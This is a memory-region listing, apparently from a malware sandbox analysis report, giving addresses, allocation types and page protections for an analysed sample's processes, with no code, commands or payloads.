26114000
|
trusted library allocation
|
page read and write
|
||
|
26320000
|
heap
|
page read and write
|
||
|
6C2D000
|
stack
|
page read and write
|
||
|
7FFD34100000
|
trusted library allocation
|
page read and write
|
||
|
26142000
|
trusted library allocation
|
page read and write
|
||
|
21400A8E000
|
trusted library allocation
|
page read and write
|
||
|
22DEEC88000
|
heap
|
page read and write
|
||
|
21401FDE000
|
trusted library allocation
|
page read and write
|
||
|
26310000
|
remote allocation
|
page read and write
|
||
|
2D60000
|
trusted library allocation
|
page read and write
|
||
|
87B0000
|
direct allocation
|
page read and write
|
||
|
2C70000
|
heap
|
page read and write
|
||
|
267BE000
|
stack
|
page read and write
|
||
|
21401FF1000
|
trusted library allocation
|
page read and write
|
||
|
267F0000
|
trusted library allocation
|
page read and write
|
||
|
22DF0F0D000
|
heap
|
page read and write
|
||
|
263DF000
|
heap
|
page read and write
|
||
|
6ACE000
|
stack
|
page read and write
|
||
|
26388000
|
heap
|
page read and write
|
||
|
267F0000
|
trusted library allocation
|
page read and write
|
||
|
84B0000
|
heap
|
page read and write
|
||
|
22DF0A61000
|
heap
|
page read and write
|
||
|
271EE000
|
stack
|
page read and write
|
||
|
22DEED1D000
|
heap
|
page read and write
|
||
|
22DEECDB000
|
heap
|
page read and write
|
||
|
22DF0AC2000
|
heap
|
page read and write
|
||
|
27E0000
|
heap
|
page read and write
|
||
|
26860000
|
trusted library allocation
|
page read and write
|
||
|
2D44000
|
trusted library allocation
|
page read and write
|
||
|
80B0000
|
trusted library allocation
|
page execute and read and write
|
||
|
22DF0EB4000
|
heap
|
page read and write
|
||
|
267E0000
|
trusted library allocation
|
page read and write
|
||
|
21401FB5000
|
trusted library allocation
|
page read and write
|
||
|
22DF0AC2000
|
heap
|
page read and write
|
||
|
267D0000
|
trusted library allocation
|
page read and write
|
||
|
2146A5F0000
|
heap
|
page read and write
|
||
|
267E0000
|
trusted library allocation
|
page read and write
|
||
|
267F0000
|
trusted library allocation
|
page read and write
|
||
|
21400A52000
|
trusted library allocation
|
page read and write
|
||
|
8590000
|
trusted library allocation
|
page read and write
|
||
|
26300000
|
heap
|
page read and write
|
||
|
26840000
|
trusted library allocation
|
page read and write
|
||
|
21469CE0000
|
trusted library allocation
|
page read and write
|
||
|
E8F1CFF000
|
stack
|
page read and write
|
||
|
22DF0ECD000
|
heap
|
page read and write
|
||
|
2710E000
|
stack
|
page read and write
|
||
|
84F5000
|
heap
|
page read and write
|
||
|
23C1E000
|
stack
|
page read and write
|
||
|
21400532000
|
trusted library allocation
|
page read and write
|
||
|
21410011000
|
trusted library allocation
|
page read and write
|
||
|
22DEED7A000
|
heap
|
page read and write
|
||
|
2146839E000
|
heap
|
page read and write
|
||
|
214683F5000
|
heap
|
page read and write
|
||
|
83DA000
|
heap
|
page read and write
|
||
|
2665E000
|
stack
|
page read and write
|
||
|
21400085000
|
trusted library allocation
|
page read and write
|
||
|
21468270000
|
heap
|
page read and write
|
||
|
2146A610000
|
heap
|
page read and write
|
||
|
267F0000
|
trusted library allocation
|
page read and write
|
||
|
22DEED6E000
|
heap
|
page read and write
|
||
|
22DF0AFF000
|
heap
|
page read and write
|
||
|
22DF0ECD000
|
heap
|
page read and write
|
||
|
E8F18FF000
|
stack
|
page read and write
|
||
|
7387000
|
trusted library allocation
|
page read and write
|
||
|
2619C000
|
stack
|
page read and write
|
||
|
8760000
|
direct allocation
|
page read and write
|
||
|
8600000
|
direct allocation
|
page read and write
|
||
|
2AE3000
|
heap
|
page read and write
|
||
|
7570000
|
trusted library allocation
|
page read and write
|
||
|
22DF0A70000
|
heap
|
page read and write
|
||
|
27070000
|
trusted library allocation
|
page read and write
|
||
|
7FFD33E53000
|
trusted library allocation
|
page execute and read and write
|
||
|
23E70000
|
direct allocation
|
page read and write
|
||
|
26310000
|
remote allocation
|
page read and write
|
||
|
26810000
|
trusted library allocation
|
page read and write
|
||
|
22DF0AC2000
|
heap
|
page read and write
|
||
|
26EF0000
|
trusted library allocation
|
page read and write
|
||
|
267D0000
|
trusted library allocation
|
page read and write
|
||
|
43419EF000
|
stack
|
page read and write
|
||
|
262B0000
|
heap
|
page read and write
|
||
|
22DF0AAD000
|
heap
|
page read and write
|
||
|
22DF0A86000
|
heap
|
page read and write
|
||
|
2E00000
|
trusted library allocation
|
page read and write
|
||
|
26EF0000
|
trusted library allocation
|
page read and write
|
||
|
22DEECE6000
|
heap
|
page read and write
|
||
|
2146A4B1000
|
heap
|
page read and write
|
||
|
2146848C000
|
heap
|
page read and write
|
||
|
7FFD340B0000
|
trusted library allocation
|
page read and write
|
||
|
8680000
|
direct allocation
|
page read and write
|
||
|
22DEED37000
|
heap
|
page read and write
|
||
|
22DF0ECD000
|
heap
|
page read and write
|
||
|
22DF0F16000
|
heap
|
page read and write
|
||
|
2659D000
|
stack
|
page read and write
|
||
|
267E0000
|
trusted library allocation
|
page read and write
|
||
|
2146A040000
|
heap
|
page execute and read and write
|
||
|
27B9000
|
heap
|
page read and write
|
||
|
22DF0A6B000
|
heap
|
page read and write
|
||
|
267F0000
|
trusted library allocation
|
page read and write
|
||
|
26800000
|
trusted library allocation
|
page read and write
|
||
|
22DF0ED3000
|
heap
|
page read and write
|
||
|
26800000
|
trusted library allocation
|
page read and write
|
||
|
21400A7E000
|
trusted library allocation
|
page read and write
|
||
|
267F0000
|
trusted library allocation
|
page read and write
|
||
|
8630000
|
trusted library allocation
|
page execute and read and write
|
||
|
7410000
|
trusted library allocation
|
page read and write
|
||
|
2414F000
|
trusted library allocation
|
page read and write
|
||
|
23E60000
|
direct allocation
|
page read and write
|
||
|
83BC000
|
heap
|
page read and write
|
||
|
22DEED7A000
|
heap
|
page read and write
|
||
|
B6F2000
|
direct allocation
|
page execute and read and write
|
||
|
5652000
|
remote allocation
|
page execute and read and write
|
||
|
7452000
|
remote allocation
|
page execute and read and write
|
||
|
24070000
|
heap
|
page execute and read and write
|
||
|
21468370000
|
heap
|
page read and write
|
||
|
6C6B000
|
stack
|
page read and write
|
||
|
267F0000
|
trusted library allocation
|
page read and write
|
||
|
729A000
|
heap
|
page read and write
|
||
|
2D59000
|
trusted library allocation
|
page read and write
|
||
|
22DF0A6F000
|
heap
|
page read and write
|
||
|
23B9B000
|
stack
|
page read and write
|
||
|
22DEEFF0000
|
heap
|
page read and write
|
||
|
267F0000
|
trusted library allocation
|
page read and write
|
||
|
267DD000
|
trusted library allocation
|
page read and write
|
||
|
267E0000
|
trusted library allocation
|
page read and write
|
||
|
2D72000
|
trusted library allocation
|
page read and write
|
||
|
27080000
|
trusted library allocation
|
page read and write
|
||
|
267F0000
|
trusted library allocation
|
page read and write
|
||
|
263E6000
|
heap
|
page read and write
|
||
|
26830000
|
trusted library allocation
|
page read and write
|
||
|
2E22000
|
trusted library allocation
|
page read and write
|
||
|
22DEECDB000
|
heap
|
page read and write
|
||
|
852C000
|
heap
|
page read and write
|
||
|
22DF0A64000
|
heap
|
page read and write
|
||
|
26F00000
|
trusted library allocation
|
page read and write
|
||
|
23F3E000
|
stack
|
page read and write
|
||
|
2B00000
|
heap
|
page read and write
|
||
|
21468390000
|
heap
|
page read and write
|
||
|
2146A445000
|
heap
|
page read and write
|
||
|
23CCD000
|
stack
|
page read and write
|
||
|
22DF0A7B000
|
heap
|
page read and write
|
||
|
6E90000
|
heap
|
page read and write
|
||
|
75B0000
|
trusted library allocation
|
page read and write
|
||
|
214005E4000
|
trusted library allocation
|
page read and write
|
||
|
75D0000
|
trusted library allocation
|
page read and write
|
||
|
21401C31000
|
trusted library allocation
|
page read and write
|
||
|
22DF0B05000
|
heap
|
page read and write
|
||
|
22DF0AFF000
|
heap
|
page read and write
|
||
|
267F0000
|
trusted library allocation
|
page read and write
|
||
|
6B8E000
|
stack
|
page read and write
|
||
|
7FFD341A0000
|
trusted library allocation
|
page read and write
|
||
|
87D0000
|
direct allocation
|
page read and write
|
||
|
26122000
|
trusted library allocation
|
page read and write
|
||
|
21401C44000
|
trusted library allocation
|
page read and write
|
||
|
8690000
|
direct allocation
|
page read and write
|
||
|
83F9000
|
heap
|
page read and write
|
||
|
749E000
|
stack
|
page read and write
|
||
|
27070000
|
trusted library allocation
|
page read and write
|
||
|
22DEED2D000
|
heap
|
page read and write
|
||
|
2611E000
|
trusted library allocation
|
page read and write
|
||
|
267F0000
|
trusted library allocation
|
page read and write
|
||
|
267E0000
|
trusted library allocation
|
page read and write
|
||
|
CAF2000
|
direct allocation
|
page execute and read and write
|
||
|
26830000
|
trusted library allocation
|
page execute and read and write
|
||
|
830C000
|
stack
|
page read and write
|
||
|
7290000
|
heap
|
page read and write
|
||
|
22DF0F1D000
|
heap
|
page read and write
|
||
|
267E0000
|
trusted library allocation
|
page read and write
|
||
|
4341DFC000
|
stack
|
page read and write
|
||
|
267F0000
|
trusted library allocation
|
page read and write
|
||
|
2146A602000
|
heap
|
page read and write
|
||
|
206406D5000
|
heap
|
page read and write
|
||
|
22DEED34000
|
heap
|
page read and write
|
||
|
22DF0A94000
|
heap
|
page read and write
|
||
|
285E000
|
unkown
|
page read and write
|
||
|
267F0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34050000
|
trusted library allocation
|
page read and write
|
||
|
267D0000
|
trusted library allocation
|
page read and write
|
||
|
214684B0000
|
heap
|
page read and write
|
||
|
267E1000
|
trusted library allocation
|
page read and write
|
||
|
27070000
|
trusted library allocation
|
page read and write
|
||
|
26131000
|
trusted library allocation
|
page read and write
|
||
|
267E0000
|
trusted library allocation
|
page read and write
|
||
|
26F00000
|
trusted library allocation
|
page read and write
|
||
|
4341C7E000
|
stack
|
page read and write
|
||
|
2AAD000
|
heap
|
page read and write
|
||
|
267E0000
|
trusted library allocation
|
page read and write
|
||
|
434227E000
|
stack
|
page read and write
|
||
|
8539000
|
heap
|
page read and write
|
||
|
267F0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34190000
|
trusted library allocation
|
page read and write
|
||
|
2635E000
|
heap
|
page read and write
|
||
|
22DF0A76000
|
heap
|
page read and write
|
||
|
E8F14FE000
|
stack
|
page read and write
|
||
|
8430000
|
heap
|
page read and write
|
||
|
2146A471000
|
heap
|
page read and write
|
||
|
23F40000
|
trusted library allocation
|
page read and write
|
||
|
214683DB000
|
heap
|
page read and write
|
||
|
22DF0A6C000
|
heap
|
page read and write
|
||
|
267E0000
|
trusted library allocation
|
page read and write
|
||
|
22DF0AA4000
|
heap
|
page read and write
|
||
|
45B0000
|
heap
|
page read and write
|
||
|
22DF0EB6000
|
heap
|
page read and write
|
||
|
889F000
|
stack
|
page read and write
|
||
|
26EF0000
|
trusted library allocation
|
page read and write
|
||
|
86A0000
|
direct allocation
|
page read and write
|
||
|
7263000
|
heap
|
page read and write
|
||
|
267F0000
|
trusted library allocation
|
page read and write
|
||
|
27070000
|
trusted library allocation
|
page read and write
|
||
|
2DA0000
|
heap
|
page readonly
|
||
|
751D000
|
stack
|
page read and write
|
||
|
22DF0EB1000
|
heap
|
page read and write
|
||
|
7FD0000
|
trusted library allocation
|
page read and write
|
||
|
267E0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD33E52000
|
trusted library allocation
|
page read and write
|
||
|
267E7000
|
trusted library allocation
|
page read and write
|
||
|
4341FFE000
|
stack
|
page read and write
|
||
|
26800000
|
trusted library allocation
|
page read and write
|
||
|
8580000
|
heap
|
page read and write
|
||
|
26830000
|
trusted library allocation
|
page read and write
|
||
|
704E000
|
stack
|
page read and write
|
||
|
214021F4000
|
trusted library allocation
|
page read and write
|
||
|
22DF0AC2000
|
heap
|
page read and write
|
||
|
7FFD340F0000
|
trusted library allocation
|
page read and write
|
||
|
26EF0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34032000
|
trusted library allocation
|
page read and write
|
||
|
27D0000
|
heap
|
page read and write
|
||
|
267E0000
|
trusted library allocation
|
page read and write
|
||
|
26820000
|
trusted library allocation
|
page read and write
|
||
|
267E0000
|
trusted library allocation
|
page read and write
|
||
|
21469DE0000
|
heap
|
page execute and read and write
|
||
|
70CE000
|
stack
|
page read and write
|
||
|
2635E000
|
heap
|
page read and write
|
||
|
23F60000
|
heap
|
page read and write
|
||
|
2DB0000
|
heap
|
page read and write
|
||
|
7FFD34080000
|
trusted library allocation
|
page read and write
|
||
|
7F860000
|
trusted library allocation
|
page execute and read and write
|
||
|
2146848E000
|
heap
|
page read and write
|
||
|
22DF0C03000
|
heap
|
page read and write
|
||
|
22DF0EB7000
|
heap
|
page read and write
|
There are 831 hidden memdumps, click here to show them.